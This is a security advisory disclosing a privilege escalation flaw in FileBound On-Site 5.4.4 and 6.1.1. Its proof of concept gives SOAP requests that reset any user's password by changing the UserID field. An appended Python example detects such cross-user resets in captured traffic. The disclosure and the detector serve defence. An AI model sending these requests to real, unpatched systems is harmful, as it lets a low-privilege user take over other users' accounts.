Sense of Security – Security Advisory – SOS-12-010
Release Date. | 10-Oct-2012 |
Last Update. | 12-Oct-2012 |
Vendor Notification Date. | 14-Aug-2012 |
Product. | FileBound On-Site |
Platform. | Windows |
Affected versions. | 5.4.4 and 6.1.1 |
Severity Rating. | High |
Impact. | Privilege escalation |
Attack Vector. | Remote with authentication |
Solution Status. | Vendor patch |
CVE reference. | Not yet assigned |
Details.
The FileBound On-Site document management application is vulnerable to privilege escalation: an authenticated user can send a modified password request to the FileBound web service.
By modifying the UserID value you can reset the password of any local user in the application without requiring administrative privileges.
Proof of Concept.
Authenticate to FileBound via the following web service method and SOAP request:
http://www.company.com/Filebound.asmx?op=Login
<soapenv:Body>
  <fil:Login>
    <fil:UserName>sosuser</fil:UserName>
    <fil:Password>daisyp0p</fil:Password>
  </fil:Login>
</soapenv:Body>
After authentication, a request can be sent to the following administrator password reset web service method and SOAP request:
http://www.company.com/Filebound.asmx?op=SetPassword2
<soapenv:Body>
  <fil:SetPassword2>
    <fil:UserID>32</fil:UserID>
    <fil:Password>lightsouthern</fil:Password>
    <fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
  </fil:SetPassword2>
</soapenv:Body>
By modifying the UserID value, the password can be reset for any existing user in the system. A response code of -1 confirms the password reset was successful.
Solution.
Install the latest vendor patch.
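Added example (not part of the original advisory and not vendor code): a Python check that reviews captured web service requests for the pattern described under Details, a SetPassword2 call from a non-administrator whose UserID is not the caller's own. The record layout, the caller IDs, and the fil namespace URI are assumptions, and the sample requests are constructed.

```python
import xml.etree.ElementTree as ET  # for untrusted input in production, prefer defusedxml

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
FIL_NS = "urn:example:filebound"  # placeholder: the advisory does not give the namespace


def make_request(user_id):  # constructed SetPassword2 envelope for the sample data
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:fil="{FIL_NS}">'
        "<soapenv:Body><fil:SetPassword2>"
        f"<fil:UserID>{user_id}</fil:UserID>"
        "<fil:Password>REDACTED</fil:Password>"
        "<fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>"
        "</fil:SetPassword2></soapenv:Body></soapenv:Envelope>"
    )


def target_user_id(soap_xml):
    """Return the UserID of a SetPassword2 call, or None for other or malformed bodies."""
    try:
        root = ET.fromstring(soap_xml)
    except ET.ParseError:
        return None
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "SetPassword2":  # match on local name
            for child in el:
                if child.tag.rsplit("}", 1)[-1] == "UserID" and child.text:
                    return child.text.strip()
    return None


def flag_cross_user_resets(records):
    """Flag SetPassword2 calls where a non-admin caller targets another user's ID."""
    findings = []
    for rec in records:
        target = target_user_id(rec["body"])
        if target is None or rec["caller_is_admin"]:
            continue
        if target != str(rec["caller_id"]):
            findings.append((rec["caller_id"], target))
    return findings


# Constructed records (hypothetical layout: authenticated caller plus request body).
SAMPLE = [
    {"caller_id": 57, "caller_is_admin": False, "body": make_request(57)},  # own password
    {"caller_id": 57, "caller_is_admin": False, "body": make_request(32)},  # another user
    {"caller_id": 1, "caller_is_admin": True, "body": make_request(32)},  # admin reset
]
```

The same comparison, made server-side before the password is changed, is the authorization check whose absence the advisory describes.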
Discovered by.
Nathaniel Carew from Sense of Security Labs.